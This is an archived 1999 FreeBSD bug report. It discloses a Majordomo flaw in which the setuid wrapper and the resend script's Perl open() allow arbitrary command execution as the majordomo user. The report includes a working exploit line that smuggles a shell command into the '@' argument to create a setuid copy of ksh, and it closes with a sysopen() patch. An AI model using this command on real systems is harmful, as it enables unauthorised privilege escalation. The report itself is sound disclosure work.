Skip site navigation (1)Skip section navigation (2) 
Date:      Wed, 29 Dec 1999 11:43:19 -0500 (EST)
From:      AnarCat@anarcat.dyndns.org
To:        FreeBSD-gnats-submit@freebsd.org
Subject:   ports/15768: Majordomo resend prog allow exec of any prog as majordomo user
Message-ID:  <19991229164319.78DC41BBD@anarcat.dyndns.org>
next in thread | raw e-mail | index | archive | help 

>Number:         15768
>Category:       ports
>Synopsis:       Majordomo resend prog allow exec of any prog as majordomo user
>Confidential:   no
>Severity:       serious
>Priority:       high
>Responsible:    freebsd-ports
>State:          open
>Quarter:        
>Keywords:       
>Date-Required:
>Class:          change-request
>Submitter-Id:   current-users
>Arrival-Date:   Wed Dec 29 11:40:01 PST 1999
>Closed-Date:
>Last-Modified:
>Originator:     AnarCat
>Release:        FreeBSD 3.4-STABLE i386
>Organization:
>Environment:

	Latest port collection (dated of 1999.12.28). Running 3.4-Stable.

	Should affect any system with latest ports collection.

>Description:

[From BugTraq, Brock Tellier, btellier@USA.NET]
	Majordomo features a wrapper that is suid root and then 
setuid(majordomo). It is used to exec various programs in the 
$PREFIX/majordomo dir. One of them is the resend Perl script which does
a 

	open(AV, $fn) || die("open(AV, \"$fn\"): $!\nStopped");

So this can be used to exec another program with the wrapper privileges.

>How-To-Repeat:

Our exploit is simple:

bash-2.02$ /usr/local/majordomo/wrapper resend '@|cp /bin/ksh
/tmp/xnec;chmod 6555 /tmp/xnec'
resend: must specify '-l list' at /usr/local/majordomo/resend line 77.

bash-2.02$ ls -la /tmp/xnec
-r-sr-sr-x    1 owner    daemon       361688 Dec 29 06:26 /tmp/xnec

In our case "owner" is majordomo. 

>Fix:
	
From BugTraq again, ("Todd C. Miller" <Todd.Miller@COURTESAN.COM>):

For those using perl 5.x, you can use sysopen() instead of the "magic"
perl open() to fix this.

 - todd

--- resend	Thu Aug 19 10:12:03 1999
+++ resend+	Tue Dec 28 23:55:39 1999
@@ -58,7 +58,7 @@
 if ($ARGV[0] =~ /^\@/) {
     $fn = shift(@ARGV);
     $fn =~ s/^@//;
-    open(AV, $fn) || die("open(AV, \"$fn\"): $!\nStopped");
+    sysopen(AV, $fn, O_RDONLY) || die("sysopen(AV, \"$fn\", O_RDONLY): $!\nStopped");
     undef($/);	# set input field separator
     $av = <AV>;	# read whole file into string
     close(AV);

>Release-Note:
>Audit-Trail:
>Unformatted:


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-ports" in the body of the message

Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?19991229164319.78DC41BBD>